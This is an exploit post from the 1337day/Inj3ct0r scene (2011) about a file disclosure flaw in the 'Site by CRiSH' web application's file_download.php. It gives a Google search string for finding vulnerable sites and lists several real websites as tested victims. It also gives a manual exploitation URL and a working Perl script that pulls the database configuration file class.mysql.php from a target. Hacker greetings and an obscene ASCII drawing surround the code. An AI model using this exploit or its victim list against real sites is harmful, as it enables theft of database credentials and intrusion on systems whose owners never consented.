Site By CRiSH File Disclosure

Posted on 12 May 2011
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME / HTTP://GRIADAMLAR.COM
--------------------------------------------------------
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Site by CRiSH
|~Price : N/A
|~Version : N/A
|~Software: http://www.iware.com.tw/
|~Vulnerability Style : Ynformation disclosure
|~Vulnerability Dir : /
|~Google Keyword : "Site by CRiSH"
|[~]Date : "10.05.2011"
|[~]Tested on :
http://trendxmarketing.com/
www.kuwaitembassy.net
http://dxnmagnumlanka.com/
http://sambuddhatvajayanthi.com//
----------------------------------------------------------
file_download.php <= 'file' Functions Not Security
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Vulnerable ON file_download.php Lines..
<?
..
@$download_file = $_REQUEST['file'];
$download = @fopen("".$_REQUEST['file'],"r");
if(!$download) die('error in openinig file');

$file = basename($_REQUEST['file']);
..
?>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
---------------------------------------------------------
Manual Exploitation|

http://Target/file_download.php?file={ Disclosure File }

Ex:
http://trendxmarketing.com/file_down...lass.mysql.php

Exploit Scsfly!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Automatic Information Disclosure Exploit.
=============== KO.PL =================================================

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Site by CRiSH <= Remote class.mysql.php Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. 

";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ 
";
print "[+] usage2 : perl $0 localhost / 
";
}
print "
*********************************************** *************************
";
print "* Plinka Design <= Remote (File Disclosure/LFI) Exploit *
";
print "* Exploited By : KnocKout *
";
print "* Contact : knockoutr[at]msn[dot]com *
";
print "* -- *
";
print "************************************************ *********************


";
($TargetIP, $path, $File,) = @ARGV;
$File="file_download.php?file=lib/class.mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "
 Az Bekle Sikertiyorum!!! 

";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "index.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!

";
print "[+] OPERASYON TAMAM !
";
print "[+] Index.php Dosyasi Indirildi (class.mysql.php)
";
print "[+] GRAYHATZ STAR 
";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....

";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !
[!] ".$request->status_line."
";
exit();
}


================================================== ==============

Exploit-DB için Bir Hediyem var.
............../'' )
...........,/¯../
........../..../
.../´¯/'...'/´¯¯`•¸
./'/.../..../......./¨¯ \n('(...´...´.... ¯~/'...' )
..................'..... / Mucxx Bitches..
..''............. _.•´
..................(
.............


# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
TOP
Malware :

Last 20
Exploits :

Last 20